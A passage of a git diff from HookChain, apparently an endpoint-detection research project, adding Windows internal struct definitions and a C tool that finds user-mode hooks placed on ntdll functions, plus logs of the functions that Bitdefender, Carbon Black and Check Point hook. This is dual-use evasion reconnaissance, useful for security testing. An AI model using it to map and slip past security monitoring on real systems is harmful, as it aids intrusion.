+			USHORT DbgInDebugPrint : 1;
+			USHORT DbgHasFiberData : 1;
+			USHORT DbgSkipThreadAttach : 1;
+			USHORT DbgWerInShipAssertCode : 1;
+			USHORT DbgIssuedInitialBp : 1;
+			USHORT DbgClonedThread : 1;
+			USHORT SpareSameTebBits : 9;
+		};
+		USHORT SameTebFlags;
+	};
+	PVOID TxnScopeEntercallback;
+	PVOID TxnScopeExitCAllback;
+	PVOID TxnScopeContext;
+	ULONG LockCount;
+	ULONG ProcessRundown;
+	ULONG64 LastSwitchTime;
+	ULONG64 TotalSwitchOutTime;
+	LARGE_INTEGER WaitReasonBitMap;
+#else
+	BOOLEAN SafeThunkCall;
+	BOOLEAN BooleanSpare[3];
+#endif
+} TEB, * PTEB;
+
+typedef struct _LDR_DATA_TABLE_ENTRY {
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	LIST_ENTRY InInitializationOrderLinks;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+	ULONG Flags;
+	WORD LoadCount;
+	WORD TlsIndex;
+	union {
+		LIST_ENTRY HashLinks;
+		struct {
+			PVOID SectionPointer;
+			ULONG CheckSum;
+		};
+	};
+	union {
+		ULONG TimeDateStamp;
+		PVOID LoadedImports;
+	};
+	PACTIVATION_CONTEXT EntryPointActivationContext;
+	PVOID PatchInformation;
+	LIST_ENTRY ForwarderLinks;
+	LIST_ENTRY ServiceTagLinks;
+	LIST_ENTRY StaticLinks;
+} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
+
+typedef struct _OBJECT_ATTRIBUTES {
+	ULONG Length;
+	PVOID RootDirectory;
+	PUNICODE_STRING ObjectName;
+	ULONG Attributes;
+	PVOID SecurityDescriptor;
+	PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
+
+typedef struct _INITIAL_TEB {
+	PVOID                StackBase;
+	PVOID                StackLimit;
+	PVOID                StackCommit;
+	PVOID                StackCommitMax;
+	PVOID                StackReserved;
+} INITIAL_TEB, * PINITIAL_TEB;
+
+/*
+#ifndef _QUEUE_USER_APC_FLAGS
+typedef enum _QUEUE_USER_APC_FLAGS {
+	QueueUserApcFlagsNone,
+	QueueUserApcFlagsSpecialUserApc,
+	QueueUserApcFlagsMaxValue
+} QUEUE_USER_APC_FLAGS;
+#endif
+*/
+
+#ifndef _USER_APC_OPTION
+typedef union _USER_APC_OPTION {
+	ULONG_PTR UserApcFlags;
+	HANDLE MemoryReserveHandle;
+} USER_APC_OPTION, * PUSER_APC_OPTION;
+#endif
+
+#ifndef _MEMORY_RESERVE_OBJECT_TYPE
+typedef enum _MEMORY_RESERVE_OBJECT_TYPE {
+	MemoryReserveObjectTypeUserApc,
+	MemoryReserveObjectTypeIoCompletion
+} MEMORY_RESERVE_OBJECT_TYPE, PMEMORY_RESERVE_OBJECT_TYPE;
+#endif
+
+typedef DWORD MEMORY_INFORMATION_CLASS;
+
+#define MemoryBasicInformation ((MEMORY_INFORMATION_CLASS)0)
+#define MemoryPrivilegedBasicInformation ((MEMORY_INFORMATION_CLASS)8)
+
+//===============================================================================================//
+#endif
+//===============================================================================================//
diff --git a/HookChain/HookChain_msg.sln b/HookChain/HookChain_msg.sln
new file mode 100644
index 0000000..94aeaeb
--- /dev/null
+++ b/HookChain/HookChain_msg.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.8.34330.188
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HookChain", "HookChain\HookChain.vcxproj", "{B0C08C11-23C4-495F-B40B-14066F12FAAB}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x64.ActiveCfg = Debug|x64
+		{B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x64.Build.0 = Debug|x64
+		{B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x86.ActiveCfg = Debug|Win32
+		{B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x86.Build.0 = Debug|Win32
+		{B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x64.ActiveCfg = Release|x64
+		{B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x64.Build.0 = Release|x64
+		{B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x86.ActiveCfg = Release|Win32
+		{B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {882B21F7-7E2B-4712-AAD3-964F097E0F07}
+	EndGlobalSection
+EndGlobal
diff --git a/enum/hookchain_finder64.7z b/enum/hookchain_finder64.7z
new file mode 100644
index 0000000..191603c
Binary files /dev/null and b/enum/hookchain_finder64.7z differ
diff --git a/enum/hookchain_finder64.c b/enum/hookchain_finder64.c
new file mode 100644
index 0000000..baea1d1
--- /dev/null
+++ b/enum/hookchain_finder64.c
@@ -0,0 +1,339 @@
+// HookChain: Hook Finder
+// Compiling gcc .\hookchain_finder64.c -o .\hookchain_finder64.exe
+//
+
+#include <winternl.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdbool.h>
+#include <dbghelp.h>
+#include <string.h>
+#include <stdlib.h>
+#include <tlhelp32.h>
+#include <winnt.h>
+#pragma comment (lib, "dbghelp.lib")
+
+#define MAX_NAME 255
+#define MAX_ENTRIES 1024
+
+typedef struct _ENTRY_INFO {
+    PVOID Address;
+    PCHAR Name;
+    BOOL IsHooked;
+} ENTRY_INFO, * PENTRY_INFO;
+
+typedef struct _NT_LIST
+{
+    long Count;
+    ENTRY_INFO Entries[MAX_ENTRIES];
+} NT_LIST, * PNT_LIST;
+
+static NT_LIST NtlList;
+
+BOOL FillNtList();
+VOID CheckDll(CHAR *name, HANDLE baseAddress);
+VOID DumpListOfHookedDlls();
+BOOL CheckHook(CHAR *callerName, CHAR *libraryName, CHAR *functionName, DWORD64 functionAddress);
+VOID ListLoadedDlls();
+
+typedef struct _CPEB {
+    BOOLEAN                 InheritedAddressSpace;
+    BOOLEAN                 ReadImageFileExecOptions;
+    BOOLEAN                 BeingDebugged;
+    BOOLEAN                 Spare;
+    HANDLE                  Mutant;
+    PVOID                   ImageBase;
+    PPEB_LDR_DATA           LoaderData;
+    PVOID                   ProcessParameters;
+    PVOID                   SubSystemData;
+    PVOID                   ProcessHeap;
+    PVOID                   FastPebLock;
+    PVOID                   FastPebLockRoutine;
+    PVOID                   FastPebUnlockRoutine;
+    ULONG                   EnvironmentUpdateCount;
+    PVOID* KernelCallbackTable;
+    PVOID                   EventLogSection;
+    PVOID                   EventLog;
+    PVOID                   FreeList;
+    ULONG                   TlsExpansionCounter;
+    PVOID                   TlsBitmap;
+    ULONG                   TlsBitmapBits[0x2];
+    PVOID                   ReadOnlySharedMemoryBase;
+    PVOID                   ReadOnlySharedMemoryHeap;
+    PVOID* ReadOnlyStaticServerData;
+    PVOID                   AnsiCodePageData;
+    PVOID                   OemCodePageData;
+    PVOID                   UnicodeCaseTableData;
+    ULONG                   NumberOfProcessors;
+    ULONG                   NtGlobalFlag;
+    BYTE                    Spare2[0x4];
+    LARGE_INTEGER           CriticalSectionTimeout;
+    ULONG                   HeapSegmentReserve;
+    ULONG                   HeapSegmentCommit;
+    ULONG                   HeapDeCommitTotalFreeThreshold;
+    ULONG                   HeapDeCommitFreeBlockThreshold;
+    ULONG                   NumberOfHeaps;
+    ULONG                   MaximumNumberOfHeaps;
+    PVOID** ProcessHeaps;
+    PVOID                   GdiSharedHandleTable;
+    PVOID                   ProcessStarterHelper;
+    PVOID                   GdiDCAttributeList;
+    PVOID                   LoaderLock;
+    ULONG                   OSMajorVersion;
+    ULONG                   OSMinorVersion;
+    ULONG                   OSBuildNumber;
+    ULONG                   OSPlatformId;
+    ULONG                   ImageSubSystem;
+    ULONG                   ImageSubSystemMajorVersion;
+    ULONG                   ImageSubSystemMinorVersion;
+    ULONG                   GdiHandleBuffer[0x22];
+    ULONG                   PostProcessInitRoutine;
+    ULONG                   TlsExpansionBitmap;
+    BYTE                    TlsExpansionBitmapBits[0x80];
+    ULONG                   SessionId;
+} CPEB, * PCPEB;
+
+BOOL FillNtList() {
+
+    printf("[+] Listing ntdll Nt/Zw functions\n------------------------------------------\n");
+
+    PTEB pCurrentTeb;
+    PCPEB pCurrentPeb;
+
+    PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+    PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+
+    PIMAGE_DOS_HEADER pImageDosHeader;
+    PIMAGE_NT_HEADERS pImageNtHeaders;
+
+    PVOID pBase;
+
+#if _WIN64
+    pCurrentTeb = (PTEB)__readgsqword(0x30);
+#else
+    pCurrentTeb = (PTEB)__readfsdword(0x16);
+#endif
+
+    pCurrentPeb = (PCPEB)pCurrentTeb->ProcessEnvironmentBlock;
+
+    if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0x0a)
+        return FALSE;
+
+    pImageExportDirectory = NULL;
+    pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+
+    pBase = pLdrDataEntry->DllBase;
+
+    pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+
+    if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+        return FALSE;
+
+    pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+
+    if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+        return FALSE;
+
+    pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(
+        (PBYTE)pBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress
+        );
+
+    PDWORD pdwFunctions;
+    PDWORD pdwNames;
+    PWORD pwNameOrdinals;
+
+    PDWORD pcName = NULL;
+    PVOID pAddress = NULL;
+
+    pdwFunctions = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfFunctions);
+    pdwNames = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNames);
+    pwNameOrdinals = (PWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNameOrdinals);
+
+    PENTRY_INFO Entries = NtlList.Entries;
+    DWORD idx = 0;
+
+    for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+        pcName = (PDWORD)((PBYTE)pBase + pdwNames[i]);
+        pAddress = (PBYTE)pBase + pdwFunctions[pwNameOrdinals[i]];
+
+        if ((*(USHORT*)pcName != 'tN') && (*(USHORT*)pcName != 'wZ'))
+            continue;
+
+        BOOLEAN dupFound = FALSE;
+        for (DWORD id = 0; id < idx; id++)
+        {
+            if ((DWORD64)Entries[id].Address == (DWORD64)pAddress)
+                dupFound = TRUE;
+        }
+
+        if (dupFound)
+            continue;
+
+        Entries[idx].Address = pAddress;
+        Entries[idx].Name = (PCHAR)pcName;
+        Entries[idx].IsHooked = FALSE;
+        if (*((PBYTE)pAddress) == 0xe9 || *((PBYTE)pAddress + 3) == 0xe9) Entries[idx].IsHooked = TRUE;
+
+        if (Entries[idx].IsHooked) printf("%s is hooked\n", pcName);
+
+        printf("   ntdll[%d] %s 0x%p\n", idx, pcName, pAddress);
+
+        idx++;
+        if (idx == MAX_ENTRIES) break;
+    }
+
+    // Save total number of system calls found.
+    NtlList.Count = idx;
+
+    printf("Mapped %d functions\n\n", NtlList.Count);
+
+    return TRUE;
+}
+
+VOID CheckDll(CHAR *name, HANDLE imageBase) {
+
+    PIMAGE_DOS_HEADER pImageDosHeader;
+    PIMAGE_NT_HEADERS pImageNtHeaders;
+    PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor = NULL;
+    HMODULE library = NULL;
+    LPCSTR libraryName = NULL;
+    
+    pImageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
+
+    if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+        return;
+
+    pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)imageBase + pImageDosHeader->e_lfanew);
+
+    if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+        return;
+
+    pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((PBYTE)imageBase + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
+
+    while (pImportDescriptor->Name != 0x00) {
+        
+        //Get name of the DLL in the Import Table
+        libraryName = (LPCSTR)((PBYTE)imageBase + pImportDescriptor->Name);
+        if ((libraryName) && (_stricmp(libraryName, "ntdll.dll") == 0)) {
+            library = GetModuleHandleA(libraryName);
+            if (library) {
+
+                DWORD cnt = 0;
+
+                printf("Checking %s at %s IAT\n", libraryName, name);
+                
+                //Get Import Lookup Table (OriginalFirstThunk) and Import Address Table (FirstThunk)
+                PIMAGE_THUNK_DATA originalFirstThunk = NULL, firstThunk = NULL;
+
+                firstThunk = (PIMAGE_THUNK_DATA) ((PBYTE) imageBase + pImportDescriptor->FirstThunk);
+                originalFirstThunk = (PIMAGE_THUNK_DATA) ((PBYTE) imageBase + pImportDescriptor->OriginalFirstThunk);
+                PIMAGE_IMPORT_BY_NAME function = NULL; 
+
+                while ((originalFirstThunk->u1.AddressOfData != NULL) && ((originalFirstThunk->u1.AddressOfData & 0xffffffffffff) >= 0x1000)){
+                    
+                    function = (PIMAGE_IMPORT_BY_NAME)((PBYTE)imageBase + originalFirstThunk->u1.AddressOfData);
+
+                    if (CheckHook(name, (char *)libraryName, function->Name, (DWORD64)firstThunk->u1.Function)) cnt++;
+                
+                    ++originalFirstThunk;
+                    ++firstThunk;
+
+                }
+
+                printf("  +-- %d hooked functions.\n\n", cnt);
+
+            }
+        }
+        pImportDescriptor++;
+    }
+}
+
+BOOL CheckHook(CHAR *callerName, CHAR *libraryName, CHAR *functionName, DWORD64 functionAddress) {
+
+    BOOL hooked = FALSE;
+    char * ntHoked = "";
+
+    PENTRY_INFO Entries = NtlList.Entries;
+    for (DWORD i = 0; i < NtlList.Count - 1; i++)
+    {
+        if (_stricmp(functionName, Entries[i].Name) == 0)
+            printf("%s %s 0x%p, 0x%p\n", functionName, Entries[i].Name, (DWORD64)Entries[i].Address, functionAddress);
+
+        if ((_stricmp(functionName, Entries[i].Name) == 0) && (strlen(functionName) == strlen(Entries[i].Name)) && ((DWORD64)Entries[i].Address != functionAddress))
+        {
+            hooked = TRUE;
+            if (Entries[i].IsHooked) ntHoked = "*";
+            break;
+        }
+    }
+
+    if (hooked) printf("  |-- %s IAT to %s of function %s%s is hooked to 0x%p\n", callerName, libraryName, ntHoked, functionName, functionAddress);
+
+    return hooked;
+}
+
+VOID DumpListOfHookedDlls() {
+    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0);
+    MODULEENTRY32 me32;
+    me32.dwSize = sizeof(MODULEENTRY32);
+
+    printf("[+] Listing hooked modules\n------------------------------------------\n");
+    if(Module32First(hSnap, &me32)) {
+        do {
+            //printf("%s is loaded at 0x%p.\n", me32.szExePath, me32.modBaseAddr);
+            CheckDll((CHAR *)&me32.szModule, me32.modBaseAddr);
+
+        } while(Module32Next(hSnap, &me32));
+    }
+
+    CloseHandle(hSnap);
+}
+
+VOID ListLoadedDlls() {
+    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0);
+    MODULEENTRY32 me32;
+    me32.dwSize = sizeof(MODULEENTRY32);
+
+    printf("[+] Listing loaded modules\n------------------------------------------\n");
+    if(Module32First(hSnap, &me32)) {
+        do {
+            printf("%s is loaded at 0x%p.\n", me32.szExePath, me32.modBaseAddr);
+
+        } while(Module32Next(hSnap, &me32));
+    }
+
+    printf("\n");
+    CloseHandle(hSnap);
+}
+
+int main (int argc, char **argv) {
+    printf("HookChainFinder M4v3r1ck by Sec4US Team\n\n");
+
+    if (!FillNtList()) {
+        printf("[-] Error getting NT... list\n");
+        ExitProcess(1);
+    }
+
+printf("[*] Press enter to continue...");  getchar();
+
+    if ( argc > 1 ) {
+        CHAR *dll = argv[1];
+        HANDLE hDll = LoadLibrary(dll);
+
+        printf("[+] Loading DLL %s\n------------------------------------------\n", dll);
+        if(hDll == NULL) {
+            printf("[-] Error loading DLL\n\n");
+        }else{
+            printf("%s is loaded at 0x%p.\n\n", dll, hDll);
+        }
+        CloseHandle(hDll);
+    }
+
+    ListLoadedDlls();
+
+    DumpListOfHookedDlls();
+
+    printf("------------------------------------------\nCompleted\n");
+
+    return 0;
+}
diff --git a/enum/hookchain_finder64.exe b/enum/hookchain_finder64.exe
new file mode 100644
index 0000000..f479aa0
Binary files /dev/null and b/enum/hookchain_finder64.exe differ
diff --git a/enum/results_enum/Result.xlsx b/enum/results_enum/Result.xlsx
new file mode 100644
index 0000000..8c4a141
Binary files /dev/null and b/enum/results_enum/Result.xlsx differ
diff --git a/enum/results_enum/bitdefender.txt b/enum/results_enum/bitdefender.txt
new file mode 100644
index 0000000..b83d905
--- /dev/null
+++ b/enum/results_enum/bitdefender.txt
@@ -0,0 +1,77 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAdjustPrivilegesToken is hooked
+NtAlpcConnectPort is hooked
+NtAlpcCreatePort is hooked
+NtAlpcSendWaitReceivePort is hooked
+NtClose is hooked
+NtCommitTransaction is hooked
+NtCreateMutant is hooked
+NtCreateProcess is hooked
+NtCreateProcessEx is hooked
+NtCreateSection is hooked
+NtCreateSectionEx is hooked
+NtCreateSymbolicLinkObject is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtCreateTransaction is hooked
+NtCreateUserProcess is hooked
+NtDuplicateObject is hooked
+NtLoadDriver is hooked
+NtMapViewOfSection is hooked
+NtMapViewOfSectionEx is hooked
+NtOpenProcess is hooked
+NtQueryInformationProcess is hooked
+NtQuerySystemEnvironmentValueEx is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtRaiseHardError is hooked
+NtReadVirtualMemory is hooked
+NtResumeThread is hooked
+NtRollbackTransaction is hooked
+NtSetContextThread is hooked
+NtSetInformationThread is hooked
+NtSetInformationTransaction is hooked
+NtSetSystemEnvironmentValueEx is hooked
+NtShutdownSystem is hooked
+NtSuspendThread is hooked
+NtTerminateProcess is hooked
+NtUnmapViewOfSection is hooked
+NtWriteFile is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff736e80000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff8657d0000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff865590000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff8632e0000.
+C:\Program Files\Bitdefender\Bitdefender Security\bdhkm\dlls_266633813365032704\bdhkm64.dll is loaded at 0x00007ff83fc20000.
+C:\Program Files\Bitdefender\Bitdefender Security\atcuf\dlls_266722497920000000\atcuf64.dll is loaded at 0x00007ff83f9e0000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ff8606c0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff864ae0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at bdhkm64.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at atcuf64.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/carbonblack.txt b/enum/results_enum/carbonblack.txt
new file mode 100644
index 0000000..6a0b08d
--- /dev/null
+++ b/enum/results_enum/carbonblack.txt
@@ -0,0 +1,108 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAllocateVirtualMemory is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtMapViewOfSection is hooked
+NtOpenProcess is hooked
+NtProtectVirtualMemory is hooked
+NtQueryInformationProcess is hooked
+NtQuerySystemInformation is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtReadVirtualMemory is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+ 
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff7785a0000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ff836030000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ff8344d0000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ff8338b0000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ff82f9c0000.
+C:\Windows\system32\ctiuser.dll is loaded at 0x00007ff828060000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ff834f40000.
+C:\Windows\System32\ADVAPI32.dll is loaded at 0x00007ff834650000.
+C:\Windows\System32\sechost.dll is loaded at 0x00007ff8355e0000.
+C:\Windows\System32\RPCRT4.dll is loaded at 0x00007ff835380000.
+C:\Windows\System32\bcrypt.dll is loaded at 0x00007ff833ed0000.
+C:\Windows\system32\FLTLIB.DLL is loaded at 0x00007ff824640000.
+C:\Windows\System32\ucrtbase.dll is loaded at 0x00007ff833c20000.
+C:\Program Files\Immidio\Flex Profiles\FlexHook64.dll is loaded at 0x00000000689e0000.
+C:\Windows\System32\USER32.dll is loaded at 0x00007ff8348f0000.
+C:\Windows\System32\win32u.dll is loaded at 0x00007ff8336e0000.
+C:\Windows\System32\GDI32.dll is loaded at 0x00007ff834710000.
+C:\Windows\System32\gdi32full.dll is loaded at 0x00007ff833db0000.
+C:\Windows\System32\msvcp_win.dll is loaded at 0x00007ff833710000.
+C:\Windows\System32\SHELL32.dll is loaded at 0x00007ff835700000.
+C:\Windows\System32\SHLWAPI.dll is loaded at 0x00007ff834a90000.
+C:\Windows\SYSTEM32\USERENV.dll is loaded at 0x00007ff833590000.
+C:\Windows\System32\IMM32.DLL is loaded at 0x00007ff834e50000.
+C:\Windows\SYSTEM32\ntmarta.dll is loaded at 0x00007ff8327b0000.
+C:\Windows\system32\vmwsci.dll is loaded at 0x00007ff8334e0000.
+C:\Windows\System32\PSAPI.DLL is loaded at 0x00007ff834640000.
+ 
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at ctiuser.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at ADVAPI32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at sechost.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at RPCRT4.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at bcrypt.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at FLTLIB.DLL IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at USER32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at GDI32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at gdi32full.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at SHELL32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at SHLWAPI.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at USERENV.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at IMM32.DLL IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at ntmarta.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at PSAPI.DLL IAT
+  +-- 0 hooked functions.
+ 
+------------------------------------------
+Completed
diff --git a/enum/results_enum/checkpoint.txt b/enum/results_enum/checkpoint.txt
new file mode 100644
index 0000000..2ec860f
--- /dev/null
+++ b/enum/results_enum/checkpoint.txt
@@ -0,0 +1,165 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAdjustPrivilegesToken is hooked
+NtAllocateVirtualMemory is hooked
+NtCreateEvent is hooked
+NtCreateMutant is hooked
+NtCreateSemaphore is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtDuplicateObject is hooked
+NtDuplicateToken is hooked
+NtFreeVirtualMemory is hooked
+NtMapViewOfSection is hooked
+NtOpenEvent is hooked
+NtOpenMutant is hooked
+NtOpenProcessToken is hooked
+NtOpenSemaphore is hooked
+NtProtectVirtualMemory is hooked
+NtQuerySystemInformation is hooked
+NtQuerySystemInformationEx is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtReadVirtualMemory is hooked
+NtResumeProcess is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtSetInformationProcess is hooked
+NtSetInformationThread is hooked
+NtSuspendProcess is hooked
+NtSuspendThread is hooked
+NtTerminateProcess is hooked
+NtTerminateThread is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 476 functions
+ 
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hook\hookchain_finder64.exe is loaded at 0x00007ff6aa0d0000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffaad0d0000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffaac5f0000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffaaa9b0000.
+C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\SBA_ISWWH.dll is loaded at 0x0000000078c90000.
+C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\cphnt64.dll is loaded at 0x00007ffa56f10000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ffaa7820000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffaac7f0000.
+C:\Program Files\NDDigital\nddPrint\Agent\nddPrint.Agent.SpoolMonitor64.dll is loaded at 0x00007ffa9f1d0000.
+C:\Windows\System32\WS2_32.dll is loaded at 0x00007ffaabdf0000.
+C:\Windows\System32\RPCRT4.dll is loaded at 0x00007ffaacb10000.
+C:\Windows\System32\USER32.dll is loaded at 0x00007ffaac390000.
+C:\Windows\System32\win32u.dll is loaded at 0x00007ffaaa950000.
+C:\Windows\System32\GDI32.dll is loaded at 0x0000018f838c0000.
+C:\Windows\System32\gdi32full.dll is loaded at 0x00007ffaaa7b0000.
+C:\Windows\System32\msvcp_win.dll is loaded at 0x00007ffaaafe0000.
+C:\Windows\System32\ucrtbase.dll is loaded at 0x00007ffaaaee0000.
+C:\Windows\System32\ADVAPI32.dll is loaded at 0x00007ffaac6b0000.
+C:\Windows\System32\sechost.dll is loaded at 0x00007ffaac970000.
+C:\Windows\System32\SHELL32.dll is loaded at 0x00007ffaab110000.
+C:\Windows\SYSTEM32\Secur32.dll is loaded at 0x00007ffaa2640000.
+C:\Windows\SYSTEM32\nddigital.log4cxx.dll is loaded at 0x0000000180000000.
+C:\Windows\SYSTEM32\WINSPOOL.DRV is loaded at 0x00007ffa98e80000.
+C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_08e1c10da83fbc83\MSVCP90.dll is loaded at 0x0000000050bb0000.
+C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_08e1c10da83fbc83\MSVCR90.dll is loaded at 0x0000000050b00000.
+C:\Windows\SYSTEM32\ODBC32.dll is loaded at 0x00007ffa991a0000.
+C:\Windows\System32\CRYPT32.dll is loaded at 0x00007ffaaac80000.
+C:\Windows\SYSTEM32\SSPICLI.DLL is loaded at 0x00007ffaaa670000.
+C:\Windows\SYSTEM32\DPAPI.DLL is loaded at 0x00007ffaaa4e0000.
+C:\Windows\System32\IMM32.DLL is loaded at 0x00007ffaab0e0000.
+C:\Windows\SYSTEM32\windows.storage.dll is loaded at 0x00007ffaa8780000.
+C:\Windows\System32\combase.dll is loaded at 0x00007ffaab910000.
+C:\Windows\SYSTEM32\Wldp.dll is loaded at 0x00007ffaaa130000.
+C:\Windows\System32\SHCORE.dll is loaded at 0x00007ffaabe60000.
+C:\Windows\System32\shlwapi.dll is loaded at 0x00007ffaaca90000.
+C:\Windows\SYSTEM32\ntmarta.dll is loaded at 0x00007ffaa9030000.
